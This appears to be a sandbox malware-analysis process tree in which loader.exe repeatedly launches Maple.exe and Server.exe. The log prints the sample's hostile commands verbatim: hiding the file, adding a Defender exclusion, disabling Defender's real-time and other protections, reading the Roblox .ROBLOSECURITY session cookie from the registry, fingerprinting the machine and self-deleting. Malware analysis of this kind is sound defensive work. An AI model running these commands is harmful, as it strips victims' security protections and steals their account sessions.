C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory36⤵PID:756
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid36⤵PID:3508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER36⤵PID:4780
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name36⤵
- Detects videocard installed
PID:4856
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause36⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1212 -
C:\Windows\system32\PING.EXEping localhost37⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4912
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"35⤵
- Checks computer location settings
PID:2368 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"36⤵
- System Location Discovery: System Language Discovery
PID:864
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"36⤵PID:4920
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"36⤵
- Checks computer location settings
PID:1248 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"37⤵
- System Location Discovery: System Language Discovery
PID:2252
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"37⤵
- Drops file in Drivers directory
PID:820 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid38⤵PID:3000
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"38⤵
- Views/modifies file attributes
PID:3944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'38⤵
- Command and Scripting Interpreter: PowerShell
PID:5008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 238⤵
- Command and Scripting Interpreter: PowerShell
PID:4600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY38⤵PID:3084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY38⤵PID:3740
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption38⤵PID:2180
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory38⤵PID:4728
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid38⤵PID:4516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER38⤵PID:4732
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name38⤵
- Detects videocard installed
PID:3216
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause38⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4700 -
C:\Windows\system32\PING.EXEping localhost39⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2320
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"37⤵
- Checks computer location settings
PID:4400 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"38⤵
- System Location Discovery: System Language Discovery
PID:3284
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"38⤵PID:3460
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"38⤵
- Checks computer location settings
PID:4044 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"39⤵
- System Location Discovery: System Language Discovery
PID:4848
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"39⤵PID:2900
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"39⤵
- Checks computer location settings
PID:2460 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"40⤵
- System Location Discovery: System Language Discovery
PID:3196
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"40⤵
- Drops file in Drivers directory
PID:1568 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid41⤵PID:4140
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"41⤵
- Views/modifies file attributes
PID:1580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'41⤵
- Command and Scripting Interpreter: PowerShell
PID:816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 241⤵
- Command and Scripting Interpreter: PowerShell
PID:4924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY41⤵
- Command and Scripting Interpreter: PowerShell
PID:2180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY41⤵PID:2844
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption41⤵PID:3200
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory41⤵PID:2408
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid41⤵PID:4856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER41⤵PID:720
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name41⤵
- Detects videocard installed
PID:4532
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause41⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2552 -
C:\Windows\system32\PING.EXEping localhost42⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4048
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"40⤵
- Checks computer location settings
PID:3276 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"41⤵
- System Location Discovery: System Language Discovery
PID:3520
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"41⤵PID:3044
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"41⤵
- Checks computer location settings
PID:3568 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"42⤵
- System Location Discovery: System Language Discovery
PID:1316
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"42⤵
- Drops file in Drivers directory
PID:4152 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid43⤵PID:4836
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"43⤵
- Views/modifies file attributes
PID:4920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'43⤵
- Command and Scripting Interpreter: PowerShell
PID:632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 243⤵
- Command and Scripting Interpreter: PowerShell
PID:4728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY43⤵
- Command and Scripting Interpreter: PowerShell
PID:1008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY43⤵PID:312
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption43⤵PID:2868
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory43⤵PID:4948
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid43⤵PID:3720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER43⤵PID:2620
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name43⤵
- Detects videocard installed
PID:4608
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause43⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3108 -
C:\Windows\system32\PING.EXEping localhost44⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4580
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"42⤵
- Checks computer location settings
PID:724 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"43⤵
- System Location Discovery: System Language Discovery
PID:1580
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"43⤵PID:232
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"43⤵
- Checks computer location settings
PID:4628 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"44⤵
- System Location Discovery: System Language Discovery
PID:4856
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"44⤵
- Drops file in Drivers directory
PID:2320 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid45⤵PID:4496
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"45⤵
- Views/modifies file attributes
PID:816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'45⤵
- Command and Scripting Interpreter: PowerShell
PID:1996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 245⤵PID:3008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY45⤵
- Command and Scripting Interpreter: PowerShell
PID:3628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY45⤵PID:4924
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption45⤵PID:4968
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory45⤵PID:4804
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid45⤵PID:4732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER45⤵PID:3552
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name45⤵
- Detects videocard installed
PID:3720
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause45⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2256 -
C:\Windows\system32\PING.EXEping localhost46⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4320
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"44⤵
- Checks computer location settings
PID:3708 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"45⤵
- System Location Discovery: System Language Discovery
PID:3172
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"45⤵PID:4404
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"45⤵
- Checks computer location settings
PID:3236 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"46⤵
- System Location Discovery: System Language Discovery
PID:5012
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"46⤵PID:1952
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"46⤵
- Checks computer location settings
PID:1304 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"47⤵
- System Location Discovery: System Language Discovery
PID:3820
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"47⤵
- Drops file in Drivers directory
PID:4728 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid48⤵PID:1584
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"48⤵
- Views/modifies file attributes
PID:3740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'48⤵
- Command and Scripting Interpreter: PowerShell
PID:2344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 248⤵
- Command and Scripting Interpreter: PowerShell
PID:4924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY48⤵PID:3720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY48⤵PID:3708
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption48⤵PID:3748
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory48⤵PID:3968
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid48⤵PID:3940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER48⤵PID:1180
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name48⤵
- Detects videocard installed
PID:2948
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause48⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4928 -
C:\Windows\system32\PING.EXEping localhost49⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4432
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"47⤵
- Checks computer location settings
PID:1996 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"48⤵
- System Location Discovery: System Language Discovery
PID:4532
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"48⤵PID:876
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"48⤵
- Checks computer location settings
PID:4516 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"49⤵
- System Location Discovery: System Language Discovery
PID:220
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"49⤵PID:4884
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"49⤵
- Checks computer location settings
PID:3300 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"50⤵
- System Location Discovery: System Language Discovery
PID:232
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"50⤵
- Drops file in Drivers directory
PID:3084 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid51⤵PID:4948
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"51⤵
- Views/modifies file attributes
PID:1048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'51⤵
- Command and Scripting Interpreter: PowerShell
PID:3968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 251⤵
- Command and Scripting Interpreter: PowerShell
PID:628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY51⤵
- Command and Scripting Interpreter: PowerShell
PID:2868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY51⤵PID:2652
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption51⤵PID:3064
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory51⤵PID:4732
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid51⤵PID:4044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER51⤵PID:3980
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name51⤵
- Detects videocard installed
PID:3196
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause51⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4864 -
C:\Windows\system32\PING.EXEping localhost52⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3720
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"50⤵
- Checks computer location settings
PID:3116 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"51⤵
- System Location Discovery: System Language Discovery
PID:3060
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"51⤵PID:3936
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"51⤵
- Checks computer location settings
PID:4836 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"52⤵
- System Location Discovery: System Language Discovery
PID:876
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"52⤵
- Drops file in Drivers directory
PID:3212 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid53⤵PID:3836
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"53⤵
- Views/modifies file attributes
PID:1248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'53⤵
- Command and Scripting Interpreter: PowerShell
PID:4636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 253⤵PID:3196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY53⤵PID:2496
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY53⤵PID:2844
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption53⤵PID:3300
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory53⤵PID:3748
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid53⤵PID:2408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER53⤵PID:3484
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name53⤵
- Detects videocard installed
PID:1468
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause53⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:180 -
C:\Windows\system32\PING.EXEping localhost54⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4424
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"52⤵
- Checks computer location settings
PID:4980 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"53⤵
- System Location Discovery: System Language Discovery
PID:4600
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"53⤵PID:2868
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"53⤵
- Checks computer location settings
PID:2464 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"54⤵
- System Location Discovery: System Language Discovery
PID:1732
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"54⤵PID:1208
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"54⤵
- Checks computer location settings
PID:3944 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"55⤵
- System Location Discovery: System Language Discovery
PID:2992
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"55⤵
- Drops file in Drivers directory
PID:3720 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid56⤵PID:4884
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"56⤵
- Views/modifies file attributes
PID:4580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'56⤵
- Command and Scripting Interpreter: PowerShell
PID:968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 256⤵PID:4980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY56⤵PID:3980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY56⤵PID:3196
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption56⤵PID:4808
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory56⤵PID:4136
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid56⤵PID:1468
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER56⤵
- Command and Scripting Interpreter: PowerShell
PID:2188
-
-
